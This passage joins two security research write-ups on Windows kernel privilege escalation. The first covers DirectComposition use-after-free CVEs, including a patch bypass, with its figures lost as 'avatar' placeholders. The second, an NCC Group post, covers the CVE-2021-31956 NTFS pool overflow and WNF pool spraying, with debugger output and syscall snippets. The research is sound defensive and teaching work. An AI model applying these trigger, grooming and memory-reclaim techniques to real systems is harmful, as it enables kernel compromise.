If tracker1 and tracker2 have been bound to binding1 already, after binding tracker1 and tracker2 to binding2, a new TrackerEntry structure will be created for binding2. Since tracker->binding != NULL at this time, tracker->binding will still save binding1 pointer and will not be updated to binding2 pointer. When the tracker is released, binding2->entry_list will retain the tracker’s dangling pointer.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

Memory layout after ReleaseResource tracker1:
avatar

It can be seen that after ReleaseResource tracker1, binding2->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26900

According to analyze the branch of ‘the new_entry_id != 0’, the root cause of CVE-2020-1381 is when creating TrackerEntry, it didn’t check the tracker object which has been bound to the binding object. The patch adds a check for tracker->binding when creating TrackerEntry:
avatar

CVE-2021-26900 is a bypass of the CVE-2020-1381 patch. The key point to bypass the patch is if the condition of tracker->binding==NULL can be constructed after the tracker is bound to the binding object.
The way to bypass is in the ‘update TrackerEntry’ branch:
avatar

When TrackerEntry->entry_id == 0, RemoveBindingManagerReferenceFromTrackerIfNecessary function is called. It checks if entry_id==0 internally, then call SetBindingManagerMarshaler to set tracker->binding=NULL:
avatar

Therefore, by setting entry_id=0 manually, the status of tracker->binding == NULL can be obtained, which can be used to bypass the CVE-2020-1381 patch.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

After setting entry_id=0 manually, the memory layout of binding1 and tracker1:
avatar

At this time, binding1->TrackerEntry still saves the pointer of tracker1, but tracker1->binding = NULL. Memory layout after ReleaseResource tracker1: avatar

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-26868

Retrospective the method in CVE-2021-26900 which sets entry_id=0 manually to get tracker->binding == NULL status to bypass the CVE-2020-1381 patch and the process of CInteractionTrackerMarshaler::ReleaseAllReferences:ReleaseAllReferences which checks that if the tracker object has a binding object, and then deletes the corresponding TrackerEntry.

So when entry_id is set to 0 manually, tracker->binding will be set to NULL. When the tracker object is released via ReleaseResource command, the TrackerEntry saved by the binding object will not be deleted, then a dangling pointer of the tracker object will be obtained again.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

Memory layout after ReleaseResource tracker1:
avatar

It can be seen that after ReleaseResource tracker1, binding1->track_list[0] saves the dangling pointer of tracker1.

CVE-2021-33739

CVE-2021-33739 is different from the vulnerability in win32kbase.sys introduced in previous sections. It is a UAF vulnerability in dwmcore.dll of the dwm.exe process. The root cause is in ReleaseResource phase of CloseChannel. In CInteractionTrackerBindingManager::RemoveTrackerBinding function call, when the element Binding->hashmap(+0x40) is deleted, the hashmap is accessed directly without checking whether the Binding object is released, which causes the UAF vulnerability.

Construct an input command buffer which can trigger the vulnerability as follows:
avatar

According to the previous analysis, in the normal scenario of CInteractionTrackerBindingManagerMarshaler::SetBufferProperty function call, the Binding object should be bound with two different Tracker objects. However, if it is bound with the same Tracker object:

(1) Binding phase:
CInteractionTrackerBindingManager::ProcessSetTrackerBindingMode function is called to process binding opreation, which calls CInteractionTrackerBindingManager::AddOrUpdateTrackerBindings function internally to update Tracker->Binding (+0x278). When Tracker has already be bound with the current Binding object, the binding operation will not be repeated:
avatar

Therefore, if the same Tracker object is bound already, the Binding object will not be bound again, then the refcnt of the Binding object will only be increased by 1 finally: avatar

(2) Release phase:
After PreRender is finished, CComposition::CloseChannel will be called to close the Channel and release the Resource in the Resource HandleTable. The Binding object will be released firstly, at this time Binding->refcnt = 1:
avatar

Then the Tracker object will be released. CInteractionTrackerBindingManager::RemoveTrackerBindings will be called to release Tracker->Binding:
avatar

Three steps are included:
(1) Get the Tracker object from the TrackerEntry
(2) Erase the corresponding Tracker pointer from Binding->hashmap (+0x40)
(3) Remove Tracker->Binding (Binding->refcnt –) from the Tracker object

The key problem is: After completing the cleanup of the first Tracker object in TrackerEntry, the Binding object may be released already. When the second Tracker object is prepared to be cleared, because the Binding object has been released, the validity of the Binding object does not be checked before the Binding->hashmap is accessed again, which result in an access vialation exception:
avatar

Exploitation: Another way to occupy freed memory

For the kernel object UAF exploitation, according to the publicly available exploit samples[5], the Palette object is used to occupy the freed memory:
avatar

Use CInteractionTrackerBindingManagerMarshaler::EmitBoundTrackerMarshalerUpdateCommands function to access the placeholder objects:
avatar

The red box here is the virtual function CInteractionTrackerMarshaler::EmitUpdateCommands of tracker1, tracker2 object (vtable + 0x50). Because the freed Tracker object has been reused by Palette, the program execution flow hijacking is achieved by forging a virtual table and writing other function pointers to fake Tracker vtable+0x50.
The sample selects nt!SeSetAccessStateGenericMapping:
avatar

With the 16-byte write capability of nt!SeSetAccessStateGenericMapping, it modifies _KTHREAD->PreviousMode = 0 to inject shellcode into Winlogon process to complete the privilege escalation.

Another way to occupy freed memory

The exploitation of Palette object is relatively common, is there some object with user-mode controllable memory size in the DirectComposition component can be exploited?

The Binding object and Tracker object we discussed before are belonged to the Resource of DirectComposition. DirectComposition contains many Resource objects, which are created by DirectComposition::CApplicationChannel::CreateInternalResource:
avatar

Each Resource has a BufferProperty, which is set by SetResourceBufferProperty command. So our object is to find one Resource which can be used to allocate a user-mode controllable memory size through the SetResourceBufferProperty command. Through searching, I found CTableTransferEffectMarshaler::SetBufferProperty. The command format is as follows:
avatar

When subcmd==0, the bufferProperty is stored at CTableTransferEffectMarshaler+0x58. The size of the bufferProperty is set by the user-mode input bufferSize, and the content is copied from the user-mode input buffer:
avatar

Modify the original sample and use the propertyBuffer of CTableTransferEffectMarshaler to occupy freed memory:
avatar
avatar

By debugging, we can see that the propertyBuffer of CTableTransferEffectMarshaler occupies the freed memory successfully:
avatar

Finally, successful exploitation screenshot:
avatar

References

[1] https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal
[2] https://www.zerodayinitiative.com/blog/2021/5/3/cve-2021-26900-privilege-escalation-via-a-use-after-free-vulnerability-in-win32k
[3] https://github.com/thezdi/PoC/blob/master/CVE-2021-26900/CVE-2021-26900.c
[4] https://ti.dbappsecurity.com.cn/blog/articles/2021/06/09/0day-cve-2021-33739/
[5] https://github.com/Lagal1990/CVE-2021-33739-POC

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

NCC Group Research

Alex Plaskett

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes many versions of Windows being affected and in-the-wild exploitation of the issue being used in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Framework (WNF) used by the in-the-wild attackers to enable novel exploit primitives. This lead to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

View this gist on GitHub

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, lets assume the following: There are two extended attributes within the extended attributes for the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 < out_buf_length - 0, data would be copied into the buffer. We will use 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values :

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario when we have the following setup if we could have the out_buf_length of 18.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.

out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 137

In the resulting check will be:

ea_block_size <= out_buf_length - padding

137 <= 0 - 2

And at this point we have underflowed the check and 137 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

View this gist on GitHub

By looking at the callers for NtfsCommonQueryEa we can see that we can see that NtQueryEaFile system call path triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled size allocation in the kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described as above.

In order to do trigger the underflow, we need to set our output buffer size to be length of the first Ea Block.

Providing we are padding the allocation, the second Ea Block will be written out of bounds of the buffer when the second Ea Block is queried.

The interesting things from this vulnerability from an attacker perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is can this be exploited reliably in the presence of modern kernel pool mitigations and is this a “good” memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between 0-18.

There is then the padding length of 2, with the second extended attribute starting at 20 offset.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size in which we want to allocate our vulnerable buffer (minus the pool header). The second extended attribute block is set to the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed in NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile. It is then necessary to trigger the vulnerable code path to act on them by setting the outbuffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows, however, not very much on recent versions of Windows 10 (19H1 and up). There has been significant changes with bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this and proposing some initial techniques. Without this paper being published already, exploitation of this issue would have been significantly harder.

Firstly the important thing to understand is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. We determine what heap structure in which the chunk lives on from the four “backends”:

Low Fragmentation Heap (LFH)
Variable Size Heap (VS)
Segment Allocation
Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12 to end up with a vulnerable chunk of sized 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation fitting being below 0x200.

We can step through the corruption of the adjacent chunk occurring by settings a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk initially and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually true, however, demonstrates that even with more restricted attacker constraints these can often be worked around and that you should always try to understand the constraints of your bug fully before jumping into exploitation

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that chunk size calculation will be, 0x12 + 0x10 = 0x22, with this then being rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facitily is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF related structures used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into non-paged pool and the session pool, however, less from a paged pool perspective. As this overflow is occurring within the paged pool, then we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

View this gist on GitHub

We can see that the argument Length is our v6 value 16 (the 0x10-byte header prepended).

Therefore, we have (0x10-bytes of _POOL_HEADER) header as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with data of a controlled size and data, and we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

